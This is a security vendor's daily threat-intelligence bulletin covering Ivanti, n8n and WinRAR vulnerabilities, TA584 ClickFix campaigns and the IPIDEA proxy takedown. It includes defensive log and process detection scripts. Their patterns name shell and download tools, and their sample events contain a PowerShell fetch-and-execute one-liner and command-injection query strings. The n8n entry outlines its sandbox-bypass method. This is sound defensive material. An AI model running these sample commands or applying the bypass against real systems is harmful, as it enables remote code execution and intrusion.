TIGR Threat Watch

Threat Watch Feed

🚩 – IOCs Added

The red flag indicates that Indicators of Compromise (IOCs) have been added to SRA’s Threat Feed used by CyberSOC clients. Articles may not be flagged if IOCs are not available at the time or are not applicable to the article.

Ivanti discloses active analysis guidance for Ivanti Endpoint Manager Mobile RCE vulnerabilities CVE-2026-1281 and CVE-2026-1340

Ivanti published an analysis on January 29, 2026 addressing two newly disclosed remote code execution vulnerabilities, CVE-2026-1281 and CVE-2026-1340, affecting Ivanti Endpoint Manager Mobile (EPMM). According to Ivanti, the flaws impact the In-House Application Distribution and Android File Transfer Configuration features and may allow arbitrary code execution on vulnerable EPMM appliances if successfully exploited. Ivanti states that Ivanti Endpoint Manager (EPM), Ivanti Neurons for MDM, and Ivanti Sentry are not directly impacted by these CVEs. Ivanti notes that, due to a limited number of confirmed impacted customers, there is insufficient visibility into adversary tactics to provide high-confidence atomic indicators. As a result, the guidance focuses on log analysis, detection of attempted exploitation, and post-exploitation behaviors observed in prior Ivanti-targeting campaigns.

Impact: Successful exploitation enables arbitrary code execution on the EPMM appliance and may expose sensitive device, user, and administrator data managed by the platform, including device identifiers, network information, and authentication details. Compromise of EPMM may also facilitate lateral movement through connected systems such as Ivanti Sentry, which is designed to tunnel traffic into internal networks. Ivanti advises treating confirmed exploitation as a full system compromise.

Recommendation: Organizations should review Ivanti’s analysis guidance and apply the latest EPMM security patches before conducting an investigation. Critical recommendations include reviewing Apache access logs, preferably from off-box SIEM or log aggregation systems, for suspicious requests to /mifs/c/(aft|app)store/fob/ endpoints that return HTTP 404 responses and contain command-like parameters. Ivanti advises inspecting systems for post-exploitation persistence such as unexpected JSP files (including modified error pages like 401.jsp), unauthorized WAR or JAR files, and evidence of reverse shells or long-running outbound connections from the appliance. If compromise is suspected, Ivanti does not recommend attempting in-place cleanup. Instead, restore EPMM from known-good backups or rebuild the appliance and migrate data, keeping the system isolated from the internet until it is fully patched. After recovery, rotate all EPMM local and service account credentials, reset LDAP or KDC lookup accounts, revoke and replace certificates used by EPMM, and review configuration changes, administrators, policies, and pushed applications for unauthorized modifications.
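As an added illustration of the log review Ivanti recommends (this is example code, not Ivanti’s or SRA’s), the script below applies the three conditions from the guidance to Apache access log lines. The “command-like parameter” heuristic, the log format, and the sample lines are assumptions constructed for the example.

```python
"""Triage Apache access logs for the request pattern Ivanti's guidance flags
for CVE-2026-1281 / CVE-2026-1340: requests to /mifs/c/(aft|app)store/fob/
that return HTTP 404 and carry command-like parameters. Sample lines are constructed."""
import re
from urllib.parse import unquote

# Apache common/combined log format: host ident user [time] "METHOD path PROTO" status bytes
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)'
)
# Endpoint pattern exactly as quoted in the bulletin.
TARGET_RE = re.compile(r'^/mifs/c/(aft|app)store/fob/')
# Heuristic (assumption) for "command-like" parameters: shell metacharacters,
# shell/interpreter names, or download utilities in the decoded query string.
CMD_HINTS = re.compile(
    r'(;|\||&&|`|\$\(|/bin/(sh|bash)|\bcurl\b|\bwget\b|\bpython\d?\b|\bnc\b)',
    re.IGNORECASE,
)

def parse_line(line):
    """Return a dict of fields, or None if the line is not in the expected format."""
    m = ACCESS_RE.match(line)
    return m.groupdict() if m else None

def is_suspicious(entry):
    """All three conditions from the guidance: target path, 404, command-like query."""
    path, _, query = entry["path"].partition("?")
    if not TARGET_RE.match(path) or entry["status"] != "404":
        return False
    return bool(CMD_HINTS.search(unquote(query)))  # decode %XX so encoding cannot hide it

def triage(log_text):
    """Return (client ip, timestamp, decoded request path) for each hit, in log order."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_suspicious(entry):
            hits.append((entry["ip"], entry["time"], unquote(entry["path"])))
    return hits

# Constructed sample: a normal app store request, two 404s with shell-like
# parameters (one URL-encoded), and a 404 on an unrelated path.
SAMPLE_LOG = """\
203.0.113.10 - - [29/Jan/2026:10:01:02 +0000] "GET /mifs/c/appstore/fob/app.html HTTP/1.1" 200 5120
203.0.113.20 - - [29/Jan/2026:10:02:15 +0000] "GET /mifs/c/aftstore/fob/x?cmd=id;whoami HTTP/1.1" 404 312
203.0.113.20 - - [29/Jan/2026:10:02:16 +0000] "GET /mifs/c/appstore/fob/x?q=%7Ccurl%20example.invalid HTTP/1.1" 404 312
203.0.113.30 - - [29/Jan/2026:10:03:00 +0000] "GET /mifs/c/other/x?cmd=id;ls HTTP/1.1" 404 312
"""

if __name__ == "__main__":
    for ip, when, path in triage(SAMPLE_LOG):
        print(f"{when} {ip} {path}")
```

Point it at logs exported from the SIEM rather than the appliance itself, as the guidance prefers; hits are a starting point for analyst review, not a verdict.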

🚩 Proofpoint reports TA584 accelerating high-volume initial access campaigns with ClickFix and new payload Tsundere Bot

Proofpoint assesses TA584 as one of the most frequently active, high-volume cybercriminal threat actors it tracks and describes the group as an initial access broker operating globally. In the second half of 2025, Proofpoint observed major changes in TA584 activity, including expanded geographic targeting, adoption of ClickFix social engineering, and delivery of a newer malware family called Tsundere Bot. Proofpoint also notes overlap between TA584 and a cluster tracked as Storm-0900, and reports that the actor’s monthly campaign volume tripled from March to December 2025. TA584’s recent tradecraft is characterized by high campaign churn and short operational lifespans. Proofpoint describes layered redirect and filtering infrastructure, frequent use of compromised sender accounts, and landing pages that adapt quickly across brands, themes, and regions. From late July 2025, Proofpoint observed the actor shifting to ClickFix workflows that instruct targets to execute PowerShell commands, which then retrieve additional remote PowerShell content to install payloads. Alongside its long-running XWorm activity, Proofpoint highlights TA584’s adoption of Tsundere Bot in late November and December 2025, describing it as malware used by multiple actors and retrieved through an installation chain that includes a Node.js installation and additional scripts.

Impact: TA584’s tempo and variability can reduce the effectiveness of static detections that depend on stable senders, consistent subjects, or long-lived infrastructure. The actor’s delivery methods are positioned to achieve initial footholds at scale, and Proofpoint assesses with high confidence that TA584 infections can lead to ransomware. The use of user-assisted execution via ClickFix and remote scripting increases the likelihood of successful execution in environments without strong PowerShell governance and application control.

Recommendation: Recommendations include restricting PowerShell use where it is not required, enforcing application control to prevent execution of tooling from user-writable paths, and creating detections for PowerShell or cmd spawning node.exe, especially when Node is installed or executed from AppData or other non-standard locations. Because ClickFix relies on Windows Run execution and clipboard-based workflows, consider restricting Windows+R for user groups that do not need it and add user training that explicitly calls out these fake error and CAPTCHA flows. Finally, monitor for staged redirects, geofenced landing infrastructure, and repeated short-lived campaigns, and prioritize investigations when a user is observed executing PowerShell content that retrieves remote scripts immediately following web-based lure interaction.
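The process-creation detections recommended above, as an added example (not Proofpoint’s or SRA’s code): field names mirror Sysmon Event ID 1, and the expected Node install roots, the user-writable path markers, and the sample events are assumptions constructed here.

```python
"""Flag process-creation events matching the TA584 tradecraft the bulletin calls out:
PowerShell or cmd spawning node.exe, Node running from AppData or other non-standard
paths, and PowerShell retrieving remote script content. Events are constructed dicts."""
import re
from pathlib import PureWindowsPath

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Where Node is expected on managed hosts (assumption; adjust to local standards).
STANDARD_NODE_ROOTS = ("c:\\program files\\nodejs", "c:\\program files (x86)\\nodejs")
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\temp\\", "\\downloads\\")
# PowerShell primitives that pull remote content, and the ones that execute it.
REMOTE_FETCH = re.compile(r"(invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b|"
                          r"downloadstring|downloadfile|net\.webclient)", re.IGNORECASE)
INVOKE = re.compile(r"(invoke-expression|\biex\b)", re.IGNORECASE)

def _name(path):
    return PureWindowsPath(path).name.lower()

def classify(event):
    """Return reason tags for one event; an empty list means nothing to review."""
    image, parent = event["Image"].lower(), event["ParentImage"].lower()
    cmdline = event.get("CommandLine", "")
    reasons = []
    if _name(image) == "node.exe":
        if _name(parent) in SHELLS:
            reasons.append("shell_spawned_node")
        if not image.startswith(STANDARD_NODE_ROOTS):
            reasons.append("node_nonstandard_path")
        if any(marker in image for marker in USER_WRITABLE):
            reasons.append("node_user_writable_path")
    if _name(image) in SHELLS and REMOTE_FETCH.search(cmdline):
        reasons.append("remote_script_fetch")
        if INVOKE.search(cmdline):
            reasons.append("fetch_piped_to_invoke")
    return reasons

def triage(events):
    """Return (index, reasons) for events needing analyst review, most tags first."""
    hits = [(i, classify(e)) for i, e in enumerate(events)]
    return sorted([h for h in hits if h[1]], key=lambda h: -len(h[1]))

# Constructed events: Node from its normal install path launched by Explorer,
# a ClickFix-style PowerShell one-liner, and Node launched by PowerShell from AppData.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\nodejs\node.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "node.exe build.js"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "irm https://example.invalid/a | iex"'},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\node\node.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "node.exe app.js"},
]

if __name__ == "__main__": print(triage(SAMPLE_EVENTS))
```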

🚩 Google disrupts IPIDEA residential proxy network used to mask cybercrime and espionage activity

Google Threat Intelligence Group (GTIG) reports it led a coordinated disruption of IPIDEA, which Google assesses is one of the world’s largest residential proxy networks. Google says the disruption included legal action to take down domains used to control enrolled devices and route proxy traffic, sharing technical intelligence with platform providers and law enforcement, and updating Google Play Protect to warn users, remove affected apps, and block future installs of apps known to include IPIDEA SDKs. Google assesses these actions degraded the proxy network and reduced its pool of devices by millions. GTIG explains that residential proxy networks route traffic through consumer ISP IP space by enrolling user devices as exit nodes, often via trojanized apps or monetization SDKs embedded into otherwise benign software. GTIG states IPIDEA is associated with multiple proxy and VPN brands and SDK families (including PacketSDK, EarnSDK, CastarSDK, and HexSDK), and describes a two-tier command and control model where Tier One domains provide Tier Two node lists for tasking and proxying. GTIG also reports that in a seven-day period in January 2026 it observed more than 550 tracked threat groups using IPIDEA exit nodes to obfuscate activity including SaaS access, on-prem activity, and password spraying.

Impact: Residential proxy infrastructure like IPIDEA increases defender difficulty by making malicious activity appear to originate from consumer ISP ranges and geographically plausible locations. This can degrade detection quality for fraud controls, identity protections, and network filtering. Google also highlights risk to consumers whose devices become exit nodes, including reputational harm from abuse tied to their IPs and potential exposure of home networks when proxy software enables inbound traffic and introduces new vulnerabilities.

Recommendation: Recommendations include incorporating IPIDEA-related indicators into blocklists and detections where appropriate, tuning identity defenses to flag logins and password spray activity from residential proxy ranges, and correlating suspicious access attempts across SaaS and on-prem logs that share proxy-like infrastructure patterns. For consumer and endpoint protection, reinforce policies that restrict installation of untrusted VPN and proxy applications.

Two Sandbox Escape Vulnerabilities in n8n Enable Remote Code Execution Through AST Bypass

JFrog Security Research disclosed two sandbox escape vulnerabilities in the n8n workflow automation platform on January 27, 2026. CVE-2026-1470, rated 9.9 Critical, affects the JavaScript expression evaluation engine in versions prior to 1.123.17, 2.4.5, or 2.5.1. CVE-2026-0863, rated 8.5 High, impacts Python Code node execution in “Internal” mode for versions prior to 1.123.14, 2.3.5, or 2.4.2. Both vulnerabilities enable remote code execution by bypassing Abstract Syntax Tree (AST) sanitization logic, and both affect n8n’s cloud platform and self-hosted deployments. CVE-2026-1470 exploits the deprecated JavaScript “with” statement to bypass the AST validation that blocks constructor access. The n8n Tournament library sanitizes expressions through ThisSanitizer, PrototypeSanitizer, and DollarSignValidator hooks alongside static regex checks for .constructor patterns. The vulnerability leverages the “with” statement to define a scope and introduce a decoy constructor identifier, tricking AST validation into treating constructor as a harmless variable while it resolves to Function.prototype.constructor at runtime. CVE-2026-0863 abuses Python 3.10+ AttributeError exception attributes to bypass getattr restrictions in the Python Code node sandbox. The SecurityConfig denies access to eval, exec, compile, open, getattr, and other dangerous built-ins while filtering the global object.

Impact: Authenticated attackers with workflow creation privileges can achieve full remote code execution on n8n instances. CVE-2026-1470 executes arbitrary code in n8n’s main node process, enabling complete instance takeover, credential theft from environment variables, and lateral movement into integrated systems. CVE-2026-0863 impacts “Internal” configuration deployments, where Python executes as a subprocess on the main node rather than in isolated Docker sidecar containers. Both vulnerabilities affect n8n’s cloud platform and self-hosted deployments, compromising AI workflow automation that handles sensitive business processes and SaaS integrations.

Recommendation: Organizations running n8n should upgrade immediately to patched versions 1.123.17, 2.4.5, or 2.5.1 for CVE-2026-1470 protection, and versions 1.123.14, 2.3.5, or 2.4.2 for CVE-2026-0863 mitigation. Configure Python Code nodes to run in “External” mode using Docker sidecar containers rather than “Internal” subprocess execution. Implement least-privilege access controls restricting which users can create or modify workflows containing expression evaluations and Python code execution. Review existing workflows for malicious expressions attempting constructor access or Python formatting-based object inspection. Deploy n8n instances with minimal environment variable exposure and network segmentation preventing lateral movement following potential compromise.

WhatsApp Introduces Strict Account Settings Lockdown Feature for High-Risk Users

WhatsApp announced Strict Account Settings on January 27, 2026, a lockdown-style security feature designed to protect high-risk users from sophisticated cyber attacks. The feature targets journalists, public figures, and others facing advanced threats by implementing maximum restrictive settings through a single toggle. Users can enable the feature by navigating to WhatsApp Settings, then Privacy, then Advanced, with rollout occurring over the coming weeks. Strict Account Settings automatically blocks attachments and media from unknown senders, silences calls from contacts not in the user’s address book, and restricts additional app functionality to minimize attack surface.

Impact: The feature provides enhanced protection for high-profile individuals frequently targeted by sophisticated threat actors through spearphishing, malicious attachments, and social engineering attacks. Automatic blocking of unknown sender attachments prevents exploitation of zero-day vulnerabilities delivered through unsolicited files. Call silencing from unknown contacts mitigates voice phishing and harassment campaigns. The lockdown approach trades convenience for security by limiting how the application functions, potentially affecting legitimate communications from new contacts while significantly reducing exposure to advanced persistent threats and targeted attacks.

Recommendation: Journalists, public figures, government officials, activists, and high-risk individuals should enable Strict Account Settings to reduce exposure to sophisticated targeted attacks. Organizations supporting high-risk personnel should include this feature in security hardening guidelines for mobile communications. Users enabling the feature should establish alternative communication channels for receiving legitimate new contact requests to avoid missing important communications. Security teams should combine this WhatsApp protection with comprehensive mobile security controls including device encryption, regular security updates, and awareness training on social engineering tactics targeting messaging platforms.

🚩 Google reports active exploitation of WinRAR CVE-2025-8088 to drop payloads into Windows Startup for persistence and initial access

Google Threat Intelligence Group (GTIG) reports widespread, active exploitation of CVE-2025-8088, a critical WinRAR path traversal vulnerability, used to gain initial access and deliver a range of payloads across multiple campaigns. GTIG states the flaw was discovered and patched in July 2025, but it continues to be exploited by a mix of government-backed actors linked to Russia and China, as well as financially motivated groups. GTIG highlights a consistent exploitation pattern where attackers leverage the vulnerability to write files into the Windows Startup folder, enabling persistence and follow-on execution. CVE-2025-8088 involves path traversal combined with Alternate Data Streams (ADS), allowing a crafted RAR archive opened in vulnerable WinRAR versions to write files to unintended locations. GTIG notes exploitation was observed as early as July 18, 2025, and RARLAB addressed the issue in WinRAR 7.13, released July 30, 2025. The NVD entry similarly describes a path traversal issue in WinRAR for Windows that can lead to code execution via crafted archives and notes exploitation in the wild.

Impact: CVE-2025-8088 remains a practical and reliable initial access vector because it exploits a common desktop utility and can blend into normal user behavior when opening archives. Successful exploitation can establish persistence via the Startup folder and enable delivery of commodity malware, credential theft tools, or espionage payloads depending on the actor. GTIG’s reporting indicates continued exploitation across diverse motivations and sectors.

Recommendation: Organizations should review GTIG’s reporting and treat WinRAR as an exposed endpoint dependency that requires aggressive patching hygiene. Critical recommendations include upgrading WinRAR to 7.13 or later across all managed Windows endpoints, verifying WinRAR is not present in unmanaged developer or shared workstation fleets, and blocking or warning on inbound RAR files from untrusted sources where feasible. Detection should focus on the predictable post-exploitation behavior GTIG highlights, especially unexpected creation of LNK, CMD, BAT, HTA, or executable artifacts in Windows Startup paths and user profile Startup folders following archive interaction.
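An added example (not GTIG’s or SRA’s code) of the detection described above: it correlates executable-type file creation in Startup folders with a preceding archive open by the same user on the same host. The event shape (loosely Sysmon EventID 1 and 11), the 10-minute window, the archiver and extension lists, and the sample events are assumptions constructed for the example.

```python
"""Correlate executable-type files created in Windows Startup folders with a
preceding archive interaction, the post-exploitation pattern GTIG describes for
CVE-2025-8088. Events are constructed; field names loosely follow Sysmon."""
from datetime import datetime, timedelta

STARTUP_MARKER = "\\start menu\\programs\\startup\\"   # user and all-users folders
ARTIFACT_EXTS = (".lnk", ".cmd", ".bat", ".hta", ".exe", ".vbs", ".js", ".ps1")
ARCHIVER_NAMES = {"winrar.exe", "unrar.exe"}
WINDOW = timedelta(minutes=10)  # assumption: max gap between archive open and drop

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def is_startup_artifact(path):
    """True for an executable-type artifact written into a Startup folder."""
    p = path.lower()
    return STARTUP_MARKER in p and p.endswith(ARTIFACT_EXTS)

def correlate(events):
    """Alert on Startup artifacts written by the archiver itself, or by any process
    within WINDOW after the same host+user opened an archive."""
    opens, alerts = [], []              # opens: (host, user, time, cmdline)
    for e in sorted(events, key=lambda e: _ts(e["UtcTime"])):
        t = _ts(e["UtcTime"])
        if e["EventID"] == 1 and _basename(e["Image"]) in ARCHIVER_NAMES:
            opens.append((e["Host"], e["User"], t, e.get("CommandLine", "")))
        elif e["EventID"] == 11 and is_startup_artifact(e["TargetFilename"]):
            creator = _basename(e["Image"])
            prior = [o for o in opens if o[0] == e["Host"] and o[1] == e["User"]
                     and t - o[2] <= WINDOW]
            if creator in ARCHIVER_NAMES or prior:
                alerts.append({"host": e["Host"], "user": e["User"], "creator": creator,
                               "file": e["TargetFilename"],
                               "archive": prior[-1][3] if prior else None})
    return alerts

# Constructed: WinRAR opens an archive and seconds later writes a .lnk into the user's
# Startup folder; a Startup .lnk from explorer.exe on another host, with no archive
# activity, is left alone.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2026-01-28 09:00:00", "Host": "WS01", "User": "CORP\\bob",
     "Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "CommandLine": 'WinRAR.exe "C:\\Users\\bob\\Downloads\\invoice.rar"'},
    {"EventID": 11, "UtcTime": "2026-01-28 09:00:03", "Host": "WS01", "User": "CORP\\bob",
     "Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"EventID": 11, "UtcTime": "2026-01-28 11:00:00", "Host": "WS02", "User": "CORP\\eve",
     "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\eve\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Outlook.lnk"},
]

if __name__ == "__main__": print(correlate(SAMPLE_EVENTS))
```

A file written into Startup by the archiver process itself is the strongest signal and alerts on its own; the time window catches second-stage droppers that run after extraction.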


About TIGR Threat Watch

Our Threat Intelligence Gathering & Research (TIGR) team is focused on threat intelligence and curates a daily intelligence report, TIGR Threat Watch, with information collected from several industry intel sources. We also create and publish ad-hoc critical vulnerability notifications in case of critical and time-sensitive vulnerabilities or threats. These notifications include details and recommendations for mitigation/remediation.